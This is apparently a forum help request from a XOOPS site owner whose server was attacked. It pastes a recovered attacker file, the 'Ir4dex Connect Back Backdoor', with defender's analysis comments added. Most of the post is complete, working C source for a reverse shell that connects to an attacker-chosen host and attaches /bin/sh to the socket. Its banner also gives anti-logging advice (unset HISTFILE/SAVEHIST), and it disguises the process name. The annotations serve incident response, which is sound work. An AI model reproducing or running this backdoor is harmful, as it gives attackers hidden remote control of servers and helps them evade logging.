My XOOPS web site is down because of a classic DoS (space-quota) attack.
The web site runs on Apache, on a Linux server...
I found this temp file on the server, left by the attacker; maybe it can give you more information:
" #include
#include
#include
#include
#include
/*
 * Analysis notes (defender's reading of the recovered file).
 *
 * This program is a connect-back ("reverse") shell, not a disk-filling or
 * denial-of-service tool: it opens an outbound TCP connection to a host and
 * port given on the command line and then runs /bin/sh with stdin, stdout
 * and stderr attached to that socket.
 *
 *   argv[1]  host name or dotted IPv4 address to connect to
 *   argv[2]  optional port; 80 is used when it is omitted
 *   returns  1 on any setup failure, 0 otherwise
 *
 * What it means for the incident: a source file like this on the server
 * shows the attacker was able to write files there, and presumably to
 * compile and run them -- NOTE(review): confirm from file ownership,
 * timestamps and the web server logs which account and which request
 * created it. Deleting the file alone does not address how it got there.
 *
 * Things to search for: the fixed strings printed below, a /bin/sh process
 * whose name shows as "shell", and outbound TCP connections from the web
 * server account (default destination port 80).
 */
int main(int argc, char **argv) {
char *host;
int port = 80;
int f;
int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
/*
 * Banner sent to the remote end once connected. It tells the operator to
 * unset HISTFILE and SAVEHIST, so shell history files on this host should
 * not be expected to contain the commands that were run.
 */
char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
/* Fixed tool banner written to local stdout. */
printf("Ir4dex Connect Back Backdoor\n\n");
/* Accept exactly one or two arguments: host, and optionally port. */
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] \n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
/* Copy the host argument into a heap buffer of l bytes. */
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
/* Optional second argument overrides the default port of 80. */
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
/* Message is Portuguese for "Resolving host name". */
printf("[*] Resolvendo Nome Do Host\n");
/* Try a name lookup first; if that fails, parse the text as a dotted address. */
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
/* Destination is the attacker-chosen address and port (IPv4, TCP). */
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
/* Message is Portuguese for "Connecting". */
printf("[*] Conectando...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
/*
 * The connection is outbound, from this server to the remote host, so a
 * firewall that only filters inbound traffic does not block it.
 */
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
/* Child: send the banner, then point fds 0, 1 and 2 at the socket. */
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
/*
 * Replace the child with /bin/sh. The second argument becomes argv[0], so
 * the process is listed under the name "shell" rather than "sh".
 */
execl("/bin/sh", "shell", NULL);
/* Reached only if execl() fails. */
close(sock);
return 0;
}
/*
 * Parent: prints "Conectado" (Portuguese for "Connected") and returns,
 * leaving the child running on its own.
 */
printf("[*] Conectado\n\n");
return 0;
} "
Does anybody know a quick fix for this? Please!